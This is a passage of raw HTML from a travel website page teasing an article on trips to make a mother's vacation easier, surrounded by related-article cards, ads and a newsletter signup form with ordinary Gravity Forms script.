id="menu-item-14577" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-14577"><a href="https://www.wendyperrin.com/secret-to-extraordinary-travel">Reviews by Travelers</a></li> <li id="menu-item-26065" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-26065"><a href="https://www.wendyperrin.com/category/travel-tips/wow-moments/">WOW Moments</a></li> </ul> </li> <li id="menu-item-11489" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-11489"><a href="https://www.wendyperrin.com/plan-trip-faq">Start A Trip</a> <ul class="sub-menu"> <li id="menu-item-11514" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-11514"><a href="https://www.wendyperrin.com/plan-trip-faq">Read This First: FAQs</a></li> <li id="menu-item-11513" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-11513"><a href="https://www.wendyperrin.com/category/plan_a_trip/where-to-go-when/">Where to Go When</a></li> <li id="menu-item-16679" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-16679"><a href="https://www.wendyperrin.com/category/plan_a_trip/best-times-to-book-trips/">What to Book When</a></li> <li id="menu-item-16675" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-16675"><a href="https://www.wendyperrin.com/the-benefits-of-booking-a-trip-early">Why to Book Early</a></li> <li id="menu-item-11537" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-11537"><a href="https://www.wendyperrin.com/wendy-amp-your-trip">WOW Moments FAQ</a></li> </ul> </li> <li id="menu-item-27435" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-27435"><a href="https://www.wendyperrin.com/secret-to-extraordinary-travel/">Reviews</a></li> </ul></div> <div id="newsletter-link"> <a href="#newsletter">Newsletter</a> </div><!-- #newsletter-link --> </div><!-- #navigation-wrap --> </div><!-- #header-wrap --> <div id="content-wrap" class="group"> <div class="content-left-wrap"> <div class="content-left"> <a href="https://www.wendyperrin.com/trips-to-make-moms-life-easier/"><span class="span-link"></span></a> <div id="page-header"><span>Wendy's WOW List: Vacation Ideas</span></div><!-- #page-header --> <div id="page-title"><h1>Trips To Make Mom’s Life Easier</h1></div><!-- #page-title --> <div id="author-date"><span>by Wendy Perrin | May 8, 2019</span></div><!-- #author-date --> <div id="destination-featured-image"> <img width="960" height="667" src="https://www.wendyperrin.com/wp-content/uploads/2019/05/Wendy-boys-dead-sea-israel-960x667.jpg" class="attachment-main-featured-image size-main-featured-image wp-post-image" alt="a mom and two sons covered in mud at the Dead Sea" /> </div><!-- #destination-featured-image --> <div id="article-copy"> <p>I’m going to tell you exactly how to give Mom an effortless trip that allows for a true vacation.</p> </div><!-- #article-copy --> </div><!-- .content-left --> <div id="footer-articles" class="group"> <div id="left-foot-article" class="column-article"> <a href="https://www.wendyperrin.com/its-not-too-late-to-book-an-awesome-summer-vacation/"><span class="span-link"></span></a> <div class="left-foot-padding"> <div id="page-header"><span>Travel Tips</span></div><!-- #page-header --> <div id="page-title"><h1>It’s Not Too Late to Book An Awesome Summer Vacation</h1></div><!-- #page-title --> <div id="author-date"><span>by Brook Wilkinson | May 7, 2019</span></div><!-- #author-date --> <div id="destination-featured-image"> <img width="1000" height="667" src="https://www.wendyperrin.com/wp-content/uploads/2018/09/Lovatnet-Lake-Stryn-Norway-shutterstock_726035722.jpg" class="attachment-main-featured-image size-main-featured-image wp-post-image" alt="Beautiful Nature Norway natural landscape aerial photography. lovatnet lake." srcset="https://www.wendyperrin.com/wp-content/uploads/2018/09/Lovatnet-Lake-Stryn-Norway-shutterstock_726035722.jpg 1000w, https://www.wendyperrin.com/wp-content/uploads/2018/09/Lovatnet-Lake-Stryn-Norway-shutterstock_726035722-768x512.jpg 768w, https://www.wendyperrin.com/wp-content/uploads/2018/09/Lovatnet-Lake-Stryn-Norway-shutterstock_726035722-800x533.jpg 800w" sizes="(max-width: 1000px) 100vw, 1000px" /> </div><!-- #destination-featured-image --> <div class="col-article-excerpt"> <p>In case you have no summer vacation lined up yet, we’ve scoured the globe and found 15 places where it’s not too late to find availability.</p> </div><!-- .col-article-exceprt --> </div><!-- .left-foot-padding --> </div><!-- #left-foot-article --> <div id="left-foot-article" class="column-article"> <a href="https://www.wendyperrin.com/10-countries-where-the-u-s-dollar-stretches-far-in-2019/"><span class="span-link"></span></a> <div class="left-foot-padding"> <div id="page-header"><span>Travel Tips</span></div><!-- #page-header --> <div id="page-title"><h1>Countries Where the U.S. Dollar Stretches Far in 2019</h1></div><!-- #page-title --> <div id="author-date"><span>by Brook Wilkinson | January 26, 2019</span></div><!-- #author-date --> <div id="destination-featured-image"> <img width="1000" height="626" src="https://www.wendyperrin.com/wp-content/uploads/2018/08/Cape-Town-Aerial-view-1-Photo-NAC-Helicopters-1000x626.jpg" class="attachment-main-featured-image size-main-featured-image wp-post-image" alt="Aerial view of Cape Town from a helicopter tour" srcset="https://www.wendyperrin.com/wp-content/uploads/2018/08/Cape-Town-Aerial-view-1-Photo-NAC-Helicopters.jpg 1000w, https://www.wendyperrin.com/wp-content/uploads/2018/08/Cape-Town-Aerial-view-1-Photo-NAC-Helicopters-768x481.jpg 768w, https://www.wendyperrin.com/wp-content/uploads/2018/08/Cape-Town-Aerial-view-1-Photo-NAC-Helicopters-160x100.jpg 160w" sizes="(max-width: 1000px) 100vw, 1000px" /> </div><!-- #destination-featured-image --> <div class="col-article-excerpt"> <p>Where in the world is the U.S. dollar relatively strong right now? Here are 10 appealing travel ideas for you:</p> </div><!-- .col-article-exceprt --> </div><!-- .left-foot-padding --> </div><!-- #left-foot-article --> <div id="left-foot-article" class="column-article"> <a href="https://www.wendyperrin.com/where-to-go-in-may-the-best-places-to-travel/"><span class="span-link"></span></a> <div class="left-foot-padding"> <div id="page-header"><span>Wendy's WOW List: where to go when</span></div><!-- #page-header --> <div id="page-title"><h1>Where to Go in May: The Best Places to Travel</h1></div><!-- #page-title --> <div id="author-date"><span>by Brook Wilkinson | April 22, 2019</span></div><!-- #author-date --> <div id="destination-featured-image"> <img width="1000" height="667" src="https://www.wendyperrin.com/wp-content/uploads/2018/08/Algarve-beach-in-Ponta-da-Piedade-Portugal-shutterstock_648798847.jpg" class="attachment-main-featured-image size-main-featured-image wp-post-image" alt="Beautiful sandy beach near Lagos in Ponta da Piedade, Algarve region, Portugal" srcset="https://www.wendyperrin.com/wp-content/uploads/2018/08/Algarve-beach-in-Ponta-da-Piedade-Portugal-shutterstock_648798847.jpg 1000w, https://www.wendyperrin.com/wp-content/uploads/2018/08/Algarve-beach-in-Ponta-da-Piedade-Portugal-shutterstock_648798847-768x512.jpg 768w, https://www.wendyperrin.com/wp-content/uploads/2018/08/Algarve-beach-in-Ponta-da-Piedade-Portugal-shutterstock_648798847-800x533.jpg 800w" sizes="(max-width: 1000px) 100vw, 1000px" /> </div><!-- #destination-featured-image --> <div class="col-article-excerpt"> <p>Don't guess about where to go in May. These are the best places to travel in spring.</p> </div><!-- .col-article-exceprt --> </div><!-- .left-foot-padding --> </div><!-- #left-foot-article --> <div id="left-foot-article" class="column-article"> <a href="https://www.wendyperrin.com/wendy-family-trip-belize/"><span class="span-link"></span></a> <div class="left-foot-padding"> <div id="page-header"><span>Family Travel</span></div><!-- #page-header --> <div id="page-title"><h1>Wendy&#8217;s Family Trip to Belize: Photos from the Beach and Sea</h1></div><!-- #page-title --> <div id="author-date"><span>by Wendy Perrin | August 28, 2018</span></div><!-- #author-date --> <div id="destination-featured-image"> <img width="1000" height="667" src="https://www.wendyperrin.com/wp-content/uploads/2018/08/Wendy-Belize-snorkeling-smiling-fish.jpg" class="attachment-main-featured-image size-main-featured-image wp-post-image" alt="Wendy Perrin snorkeling in Belize underwater with a smiling fish" srcset="https://www.wendyperrin.com/wp-content/uploads/2018/08/Wendy-Belize-snorkeling-smiling-fish.jpg 1000w, https://www.wendyperrin.com/wp-content/uploads/2018/08/Wendy-Belize-snorkeling-smiling-fish-768x512.jpg 768w, https://www.wendyperrin.com/wp-content/uploads/2018/08/Wendy-Belize-snorkeling-smiling-fish-800x533.jpg 800w" sizes="(max-width: 1000px) 100vw, 1000px" /> </div><!-- #destination-featured-image --> <div class="col-article-excerpt"> <p>I chose Belize for a recent family trip because the best vacations are those where you try something new you’ve never done before.</p> </div><!-- .col-article-exceprt --> </div><!-- .left-foot-padding --> </div><!-- #left-foot-article --> <div id="left-foot-article" class="column-article"> <a href="https://www.wendyperrin.com/how-to-avoid-the-crowds-in-europe/"><span class="span-link"></span></a> <div class="left-foot-padding"> <div id="page-header"><span>Wendy's WOW List: Travel Tips</span></div><!-- #page-header --> <div id="page-title"><h1>How to Avoid the Crowds in Europe</h1></div><!-- #page-title --> <div id="author-date"><span>by Sara Tucker | April 10, 2018</span></div><!-- #author-date --> <div id="destination-featured-image"> <img width="1000" height="667" src="https://www.wendyperrin.com/wp-content/uploads/2016/11/Eiffel-Tower-Pixabay.jpg" class="attachment-main-featured-image size-main-featured-image wp-post-image" alt="The Eiffel Tower and surrounding gardens, Paris" srcset="https://www.wendyperrin.com/wp-content/uploads/2016/11/Eiffel-Tower-Pixabay.jpg 1000w, https://www.wendyperrin.com/wp-content/uploads/2016/11/Eiffel-Tower-Pixabay-800x533.jpg 800w" sizes="(max-width: 1000px) 100vw, 1000px" /> </div><!-- #destination-featured-image --> <div class="col-article-excerpt"> <p>If you’re planning a trip to Europe this summer, arm yourself with a few strategies to avoid the kinds of crowds that can spoil a European vacation.</p> </div><!-- .col-article-exceprt --> </div><!-- .left-foot-padding --> </div><!-- #left-foot-article --> <div id="left-foot-article" class="column-article"> <a href="https://www.wendyperrin.com/how-to-buy-travel-insurance-what-it-covers-when-you-need-it/"><span class="span-link"></span></a> <div class="left-foot-padding"> <div id="page-header"><span>Travel Tips</span></div><!-- #page-header --> <div id="page-title"><h1>How to Buy Travel Insurance: What It Covers, When You Need It</h1></div><!-- #page-title --> <div id="author-date"><span>by Brook Wilkinson | December 18, 2018</span></div><!-- #author-date --> <div id="destination-featured-image"> <img width="1000" height="667" src="https://www.wendyperrin.com/wp-content/uploads/2017/02/orange-life-preserver-CR-Pixabay.jpg" class="attachment-main-featured-image size-main-featured-image wp-post-image" alt="orange life preserver on hook at lake" srcset="https://www.wendyperrin.com/wp-content/uploads/2017/02/orange-life-preserver-CR-Pixabay.jpg 1000w, https://www.wendyperrin.com/wp-content/uploads/2017/02/orange-life-preserver-CR-Pixabay-800x533.jpg 800w" sizes="(max-width: 1000px) 100vw, 1000px" /> </div><!-- #destination-featured-image --> <div class="col-article-excerpt"> <p>Travel insurance can be confusing. So we’ve created this primer that lays out the basics of travel insurance, including when you need it—and when you don’t.</p> </div><!-- .col-article-exceprt --> </div><!-- .left-foot-padding --> </div><!-- #left-foot-article --> <div id="left-foot-article" class="column-article"> <a href="https://www.wendyperrin.com/wow-list/"><span class="span-link"></span></a> <div class="left-foot-padding"> <div id="page-header"><span>Wendy's WOW List: The People</span></div><!-- #page-header --> <div id="page-title"><h1>The WOW List</h1></div><!-- #page-title --> <div id="author-date"><span>by Wendy Perrin | May 16, 2019</span></div><!-- #author-date --> <div id="destination-featured-image"> <img width="864" height="481" src="https://www.wendyperrin.com/wp-content/uploads/2019/02/2019-WOW-List-turquoise-intro.jpg" class="attachment-main-featured-image size-main-featured-image wp-post-image" alt="" srcset="https://www.wendyperrin.com/wp-content/uploads/2019/02/2019-WOW-List-turquoise-intro.jpg 864w, https://www.wendyperrin.com/wp-content/uploads/2019/02/2019-WOW-List-turquoise-intro-768x428.jpg 768w" sizes="(max-width: 864px) 100vw, 864px" /> </div><!-- #destination-featured-image --> <div class="col-article-excerpt"> <p>Wendy Perrin reveals a sampling of the best trip planners and travel specialists she's found in 25 years of reporting on the travel industry.</p> </div><!-- .col-article-exceprt --> </div><!-- .left-foot-padding --> </div><!-- #left-foot-article --> <div id="left-foot-article" class="column-article"> <a href="https://www.wendyperrin.com/primer-stress-free-family-travel/"><span class="span-link"></span></a> <div class="left-foot-padding"> <div id="page-header"><span>Family Travel</span></div><!-- #page-header --> <div id="page-title"><h1>A Primer on Stress-Free Family Travel</h1></div><!-- #page-title --> <div id="author-date"><span>by Billie Cohen | May 8, 2017</span></div><!-- #author-date --> <div id="destination-featured-image"> <img width="1000" height="667" src="https://www.wendyperrin.com/wp-content/uploads/2018/03/Wendy-Family-Petra-Jordan-2.jpg" class="attachment-main-featured-image size-main-featured-image wp-post-image" alt="" srcset="https://www.wendyperrin.com/wp-content/uploads/2018/03/Wendy-Family-Petra-Jordan-2.jpg 1000w, https://www.wendyperrin.com/wp-content/uploads/2018/03/Wendy-Family-Petra-Jordan-2-768x512.jpg 768w, https://www.wendyperrin.com/wp-content/uploads/2018/03/Wendy-Family-Petra-Jordan-2-800x533.jpg 800w" sizes="(max-width: 1000px) 100vw, 1000px" /> </div><!-- #destination-featured-image --> <div class="col-article-excerpt"> <p>Happy Mother’s Day to all you moms and caregivers out there! Our gift to you this Mother’s Day (and, really, every day) is to help you stay sane when you travel with your kids. </p> </div><!-- .col-article-exceprt --> </div><!-- .left-foot-padding --> </div><!-- #left-foot-article --> </div><!-- #footer-articles --> </div><!-- .content-left-wrap --> <div id="content-right-wrap"> <div id="travel-tips-header" class="sidebar-wendy-header" style="padding-top: 0px; border-bottom: 1px solid #ccc;"> <div id="home-wendy-image"> <img src="https://www.wendyperrin.com/wp-content/uploads/2017/09/Wendy-Bushtracks-Express-vintage-steam-train-Victoria-Falls-150x150.jpg" /> </div><!-- #home-wendy-image --> <div class="sidebar-blue-text"> <h3>How to Get the Best Trip Possible</h3> <p>On behalf of, and by popular demand from, my longtime readership of sophisticated travelers, I&#8217;ve created a unique system to help them get the caliber of trip they seek. <a href="https://www.wendyperrin.com/plan-trip-faq/" target="_blank" rel="noopener">Here’s how you can get it too</a>.</p> <p>&nbsp;</p> <p><strong><a href="https://www.wendyperrin.com/secret-to-extraordinary-travel/" target="_blank" rel="noopener">CLICK HERE TO READ REVIEWS</a></strong></p> <p>&nbsp;</p> <p>Read about Wendy in</p> <p><a href="http://www.bbc.com/travel/story/20130821-forms-of-identification-wendy-perrin" target="_blank" rel="noopener noreferrer"><span style="font-weight: 400;">BBC Travel</span></a><span style="font-weight: 400;">, </span><a href="http://www.brides.com/blogs/aisle-say/2015/05/honeymoon-mistakes-not-to-make.html" target="_blank" rel="noopener noreferrer"><span style="font-weight: 400;">Brides</span></a><span style="font-weight: 400;">, </span><a href="https://www.cntraveler.com/stories/2011-11-30/the-wizardry-of-wendy-perrin-travel-specialist-collection" target="_blank" rel="noopener noreferrer"><span style="font-weight: 400;">Condé Nast Traveler</span></a><span style="font-weight: 400;">, <a href="http://www.independenttraveler.com/blog/index.php/2015/07/14/finding-vip-travel-experiences-a-qa-with-wendy-perrin/" target="_blank" rel="noopener noreferrer">Independent Traveler</a>,</span><span style="font-weight: 400;"> </span><a href="http://www.marthastewartweddings.com/399890/when-travel-agent-is-worth-it-for-honeymoon" target="_blank" rel="noopener noreferrer"><span style="font-weight: 400;">Martha Stewart Weddings</span></a><span style="font-weight: 400;">, </span><a href="http://mashable.com/2015/10/21/what-to-tip/#UvgdWhPnqaq7" target="_blank" rel="noopener noreferrer"><span style="font-weight: 400;">Mashable</span></a><span style="font-weight: 400;">, </span><a href="http://www.oprah.com/inspiration/How-to-Travel-Alone_1/4" target="_blank" rel="noopener noreferrer"><span style="font-weight: 400;">Oprah Magazine</span></a><span style="font-weight: 400;">, </span><a href="http://www.townandcountrymag.com/leisure/travel-guide/a4354/the-travel-whisperer/" target="_blank" rel="noopener noreferrer"><span style="font-weight: 400;">Town&amp;Country</span></a><span style="font-weight: 400;">, </span><a href="http://www.travelandleisure.com/blogs/why-use-a-travel-agent" target="_blank" rel="noopener noreferrer"><span style="font-weight: 400;">Travel + Leisure</span></a><span style="font-weight: 400;">, </span><a href="https://tripadvisor.mediaroom.com/2014-04-28-Wendy-Perrin-Named-TripAdvisor-Travel-Advocate" target="_blank" rel="noopener noreferrer"><span style="font-weight: 400;">TripAdvisor</span></a><span style="font-weight: 400;">, </span><a href="http://time.com/3942134/family-holiday-vacation-tips/" target="_blank" rel="noopener noreferrer"><span style="font-weight: 400;">TIME</span></a><span style="font-weight: 400;">, </span><a href="http://travel.usnews.com/gallery/from-zika-to-terrorism-how-to-protect-yourself-while-traveling-abroad/" target="_blank" rel="noopener noreferrer"><span style="font-weight: 400;">U.S. News &amp; World Report</span></a><span style="font-weight: 400;">, </span><a href="https://www.wsj.com/articles/how-new-breed-travel-agents-can-give-you-an-edge-1514390557" target="_blank" rel="noopener"><span style="font-weight: 400;">The Wall Street Journal</span></a></p> <p>&nbsp;</p> <p style="text-align: center;"><em><strong>&#8220;Wendy Perrin shares her travel secrets, and it&#8217;s as close as you can</strong></em><em><strong> get to vacation perfection.&#8221; —<a href="http://www.townandcountrymag.com/leisure/travel-guide/a4354/the-travel-whisperer/">Town&amp;Country</a></strong></em></p> </div><!-- .sidebar-blue-text --> </div><!-- #travel-tips-header --> <div style="padding-top: 30px;"></div> <div class="destination-ad"> <ins class='dcmads' style='display:inline-block;width:300px;height:250px' data-dcm-placement='N46002.2482902WENDYPERRIN/B20571838.213394602' data-dcm-rendering-mode='iframe' data-dcm-https-only data-dcm-resettable-device-id='' data-dcm-app-id=''> <script src='https://www.googletagservices.com/dcm/dcmads.js'></script> </ins> </div><!-- #destination-ad --> <div class="destination-ad destination-ad-bot"> <a target="_blank" href="http://www.fogoislandinn.ca/"><img src="https://www.wendyperrin.com/wp-content/uploads/2018/01/Fogo-Quiet-02.gif" /></a> </div><!-- #destination-ad --> <a href="https://www.wendyperrin.com/wendy-amp-your-trip"> <div id="travel-tips-header" class="sidebar-blue-header"> <div class="sidebar-blue-text"> <h3>Wendy Wants To Amp Up Your Trip!</h3> <p><p>On every third qualifying trip, Wendy will add a surprise WOW Moment to your itinerary. Click for details.</p> </p> <div class="circle-icon"> <img src="https://wendyperrin.com/images/icons/key-icon.png" /> </div><!-- .circle-icon --> </div><!-- .sidebar-blue-text --> </div><!-- #travel-tips-header --> </a> <div class="travel-tip-item"> <div class="travel-tip-item-content"> <h4>WENDY'S “WOW MOMENTS” PROJECT</h4> <h3>WOW Moment: Seeing Cuba Through the Eyes of Famous Photographers</h3> <p>by Billie Cohen | March 26, 2019</p> <a href="https://www.wendyperrin.com/wow-moment-cuba-through-the-eyes-of-famous-photographers/"><span></span></a> </div><!-- .travel-tip-item-content --> </div><!-- .travel-tip-item --> <div class="travel-tip-item"> <div class="travel-tip-item-content"> <h4>WENDY'S “WOW MOMENTS” PROJECT</h4> <h3>WOW Moment: An Extraordinary Church Ceremony in Ethiopia</h3> <p>by Billie Cohen | February 11, 2019</p> <a href="https://www.wendyperrin.com/wow-moment-an-extraordinary-church-ceremony-in-ethiopia/"><span></span></a> </div><!-- .travel-tip-item-content --> </div><!-- .travel-tip-item --> <div class="travel-tip-item"> <div class="travel-tip-item-content"> <h4>WENDY'S “WOW MOMENTS” PROJECT</h4> <h3>WOW Moment: A Bora Bora Overwater Bungalow Surprise</h3> <p>by Sara Tucker | February 6, 2018</p> <a href="https://www.wendyperrin.com/wow-moment-bora-bora-overwater-bungalow/"><span></span></a> </div><!-- .travel-tip-item-content --> </div><!-- .travel-tip-item --> <div class="destination-ad destination-ad-bot"> <a target="_blank" href="https://www.wendyperrin.com/wendy-amp-your-trip"><img src="https://www.wendyperrin.com/wp-content/uploads/2015/03/south-africa-ad-1.jpg" /></a> </div><!-- #destination-ad --> </div><!-- #content-right-wrap --> </div><!-- #content-wrap --> <div id="ask-wendy-foot"> <div class="ask-wendy-foot-padding"> <div id="ask-wendy-foot-head" class="group"> <div class="ask-wendy-title"> <span>What to Book When</span> </div><!-- .ask-wendy-title --> <div class="ask-wendy-view-all"> <a href="https://www.wendyperrin.com/best-times-to-book-trips/"><span>View All</span></a> </div><!-- .ask-wendy-view-all --> </div><!-- #ask-wendy-foot-head --> <div id="ask-wendy-triple"> <div class="ask-wendy-item"> <a href="https://www.wendyperrin.com/what-to-book-now-best-trips-to-book-in-may/"> <!--<h3>The Best Trips to Book in May: What to Lock in Now</h3>--> <img width="295" height="200" src="https://www.wendyperrin.com/wp-content/uploads/2018/07/WTB-May-image-small-abbrev-295x200.png" class="attachment-advice-image size-advice-image wp-post-image" alt="" /> </a> <!--<div class="ask-wendy-auth-date">Brook Wilkinson | April 30, 2019</div>--> </div><!-- .ask-wendy-item --> <div class="ask-wendy-item"> <a href="https://www.wendyperrin.com/book-now-best-trips-book-june/"> <!--<h3>The Best Trips to Book in June: What to Lock in Now</h3>--> <img width="295" height="200" src="https://www.wendyperrin.com/wp-content/uploads/2018/07/WTB-June-image-small-abbrev-295x200.png" class="attachment-advice-image size-advice-image wp-post-image" alt="" /> </a> <!--<div class="ask-wendy-auth-date">Brook Wilkinson | May 22, 2018</div>--> </div><!-- .ask-wendy-item --> <div class="ask-wendy-item"> <a href="https://www.wendyperrin.com/its-july-and-this-is-your-monthly-guide-to-what-trips-to-book-now/"> <!--<h3>The Best Trips to Book in July: What to Lock in Now</h3>--> <img width="295" height="200" src="https://www.wendyperrin.com/wp-content/uploads/2018/05/WTG-July-image-295x200.png" class="attachment-advice-image size-advice-image wp-post-image" alt="" /> </a> <!--<div class="ask-wendy-auth-date">Brook Wilkinson | June 22, 2018</div>--> </div><!-- .ask-wendy-item --> </div><!-- #ask-wendy-triple --> </div><!-- .ask-wendy-foot-padding --> </div><!-- #ask-wendy-foot --> <div id="newsletter"></div> <div id="sign-up-wrap"> <div id="sign-up-content"> <div id="footer-mail-icon" class="circle-icon"> <img src="https://wendyperrin.com/dev/images/icons/mail-icon.png" /> </div> <div id="mail-copy-wrap"> <div id="footer-mail-form"> <div class='gf_browser_safari gform_wrapper gplaceholder_wrapper' id='gform_wrapper_2' ><a id='gf_2' class='gform_anchor' ></a><form method='post' enctype='multipart/form-data' target='gform_ajax_frame_2' id='gform_2' class='gplaceholder' action='/#gf_2'> <div class='gform_heading'> <span class='gform_description'></span> </div> <div class='gform_body'><ul id='gform_fields_2' class='gform_fields top_label form_sublabel_below description_below'><li id='field_2_4' class='gfield gfield_html gfield_html_formatted gfield_no_follows_desc field_sublabel_below field_description_below gfield_visibility_visible' ><div id="mail-signup-head"> <h3>We Have More To Tell You!</h3> </div><!-- #mail-signup-head --> <div id="mail-signup-copy"> <p>Sign up for Wendy Perrin's newsletter and be the first to know about travel deals from trusted friends, as well as ideas to make your next trip extraordinary.</p> </div><!-- #mail-signup-copy --></li><li id='field_2_1' class='gfield gfield_contains_required field_sublabel_below field_description_below gfield_visibility_visible' ><label class='gfield_label' for='input_2_1' >First Name<span class='gfield_required'>*</span></label><div class='ginput_container ginput_container_text'><input name='input_1' id='input_2_1' type='text' value='' class='medium' tabindex='200' aria-required="true" aria-invalid="false" /></div></li><li id='field_2_2' class='gfield gfield_contains_required field_sublabel_below field_description_below gfield_visibility_visible' ><label class='gfield_label' for='input_2_2' >Last Name<span class='gfield_required'>*</span></label><div class='ginput_container ginput_container_text'><input name='input_2' id='input_2_2' type='text' value='' class='medium' tabindex='201' aria-required="true" aria-invalid="false" /></div></li><li id='field_2_3' class='gfield gfield_contains_required field_sublabel_below field_description_below gfield_visibility_visible' ><label class='gfield_label' for='input_2_3' >Email<span class='gfield_required'>*</span></label><div class='ginput_container ginput_container_email'> <input name='input_3' id='input_2_3' type='text' value='' class='medium' tabindex='202' aria-required="true" aria-invalid="false"/> </div></li> </ul></div> <div class='gform_footer top_label'> <input type='submit' id='gform_submit_button_2' class='gform_button button' value='Sign Up Now' tabindex='203' onclick='if(window["gf_submitting_2"]){return false;} window["gf_submitting_2"]=true; ' onkeypress='if( event.keyCode == 13 ){ if(window["gf_submitting_2"]){return false;} window["gf_submitting_2"]=true; jQuery("#gform_2").trigger("submit",[true]); }' /> <input type='hidden' name='gform_ajax' value='form_id=2&amp;title=&amp;description=1&amp;tabindex=200' /> <input type='hidden' class='gform_hidden' name='is_submit_2' value='1' /> <input type='hidden' class='gform_hidden' name='gform_submit' value='2' /> <input type='hidden' class='gform_hidden' name='gform_unique_id' value='' /> <input type='hidden' class='gform_hidden' name='state_2' value='WyJbXSIsIjFlZjdlZTBkMTg3ZTgwODIxOTA5Nzk2YzlmYmE0OWVjIl0=' /> <input type='hidden' class='gform_hidden' name='gform_target_page_number_2' id='gform_target_page_number_2' value='0' /> <input type='hidden' class='gform_hidden' name='gform_source_page_number_2' id='gform_source_page_number_2' value='1' /> <input type='hidden' name='gform_field_values' value='' /> </div> </form> </div> <iframe style='display:none;width:0px;height:0px;' src='about:blank' name='gform_ajax_frame_2' id='gform_ajax_frame_2'>This iframe contains the logic required to handle Ajax powered Gravity Forms.</iframe> <script type='text/javascript'>jQuery(document).ready(function($){gformInitSpinner( 2, 'https://www.wendyperrin.com/wp-content/plugins/gravityforms/images/spinner.gif' );jQuery('#gform_ajax_frame_2').on('load',function(){var contents = jQuery(this).contents().find('*').html();var is_postback = contents.indexOf('GF_AJAX_POSTBACK') >= 0;if(!is_postback){return;}var form_content = jQuery(this).contents().find('#gform_wrapper_2');var is_confirmation = jQuery(this).contents().find('#gform_confirmation_wrapper_2').length > 0;var is_redirect = contents.indexOf('gformRedirect(){') >= 0;var is_form = form_content.length > 0 && ! is_redirect && ! is_confirmation;if(is_form){jQuery('#gform_wrapper_2').html(form_content.html());if(form_content.hasClass('gform_validation_error')){jQuery('#gform_wrapper_2').addClass('gform_validation_error');} else {jQuery('#gform_wrapper_2').removeClass('gform_validation_error');}setTimeout( function() { /* delay the scroll by 50 milliseconds to fix a bug in chrome */ jQuery(document).scrollTop(jQuery('#gform_wrapper_2').offset().top); }, 50 );if(window['gformInitDatepicker']) {gformInitDatepicker();}if(window['gformInitPriceFields']) {gformInitPriceFields();}var current_page = jQuery('#gform_source_page_number_2').val();gformInitSpinner( 2, 'https://www.wendyperrin.com/wp-content/plugins/gravityforms/images/spinner.gif' );jQuery(document).trigger('gform_page_loaded', [2, current_page]);window['gf_submitting_2'] = false;}else if(!is_redirect){var confirmation_content = jQuery(this).contents().find('.GF_AJAX_POSTBACK').html();if(!confirmation_content){confirmation_content = contents;}setTimeout(function(){jQuery('#gform_wrapper_2').replaceWith(confirmation_content);jQuery(document).scrollTop(jQuery('#gf_2').offset().top);jQuery(document).trigger('gform_confirmation_loaded', [2]);window['gf_submitting_2'] = false;}, 50);}else{jQuery('#gform_2').append(contents);if(window['gformRedirect']) {gformRedirect();}}jQuery(document).trigger('gform_post_render', [2, current_page]);} );} );</script><script type='text/javascript'> if(typeof gf_global == 'undefined') var gf_global = {"gf_currency_config":{"name":"U.S. Dollar","symbol_left":"$","symbol_right":"","symbol_padding":"","thousand_separator":",","decimal_separator":".","decimals":2},"base_url":"https:\/\/www.wendyperrin.com\/wp-content\/plugins\/gravityforms","number_formats":[],"spinnerUrl":"https:\/\/www.wendyperrin.com\/wp-content\/plugins\/gravityforms\/images\/spinner.gif"};jQuery(document).bind('gform_post_render', function(event, formId, currentPage){if(formId == 2) {} } );jQuery(document).bind('gform_post_conditional_logic', function(event, formId, fields, isInit){} );</script><script type='text/javascript'> jQuery(document).ready(function(){jQuery(document).trigger('gform_post_render', [2, 1]) } ); </script> </div><!-- #footer-mail-form --> </div><!-- #mail-copy-wrap --> </div><!-- #sign-up-content --> </div><!-- #sign-up-wrap --> <div id="footer-wrap"> <div id="footer-content"> <div id="footer-logo"> <a href="#"><img src="https://www.wendyperrin.com/wp-content/themes/wendy-perrin-child/img/footer-logo.png" /></a> </div><!-- #footer-logo --> <div id="footer-social-icons"> <div id="fb-icon-foot" class="icon-head"><a target="_blank" href="https://www.facebook.com/WendyPerrinTravel"><span></span></a></div><!-- #fb-icon-foot --> <div id="tw-icon-foot" class="icon-head"><a target="_blank" href="https://twitter.com/wendyperrin"><span></span></a></div><!-- #tw-icon-foot --> <div id="ig-icon-foot" class="icon-head"><a target="_blank" href="http://instagram.com/wendyperrin"><span></span></a></div><!-- #ig-icon-foot --> <div id="pn-icon-foot" class="icon-head"><a target="_blank" href="http://www.pinterest.com/wperrin/"><span></span></a></div><!-- #pn-icon-foot --> <div id="gp-icon-foot" class="icon-head"><a target="_blank" href="https://plus.google.com/+WendyPerrin/"><span></span></a></div><!-- #gp-icon-foot --> </div><!-- #footer-social-icons --> <div id="footer-excerpt"> <p>I’m not a travel agent—I’m a travel journalist who has spent the past 20 years finding, testing, and monitoring the world’s best trip planners, so that you can:<br /> <br /> Eliminate crowds, lines, tourist traps, and annoying logistics.<br /> Get VIP benefits, insider access, and unbeatable value.</p> </div><!-- #footer-excerpt --> <hr class="footer-rule" /> <div id="footer-menu"> <div class="menu-footer-menu-container"><ul id="menu-footer-menu" class="footer-menu"><li id="menu-item-2679" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2679"><a href="https://www.wendyperrin.com/destinations/">Destinations</a></li> <li id="menu-item-2676" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2676"><a href="https://www.wendyperrin.com/about/">About</a></li> <li id="menu-item-2677" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2677"><a href="https://www.wendyperrin.com/ask-wendy-question/">Ask Wendy</a></li> <li id="menu-item-2681" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2681"><a href="https://www.wendyperrin.com/travel-tips/">Travel Tips</a></li> <li id="menu-item-4684" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-4684"><a href="https://www.wendyperrin.com/wow-list/">The WOW List</a></li> <li id="menu-item-2678" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2678"><a href="https://www.wendyperrin.com/contact/">Contact</a></li> <li id="menu-item-9371" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-9371"><a href="/privacy-policy">Privacy Policy</a></li> </ul></div> </div><!-- #footer-menu --> <div 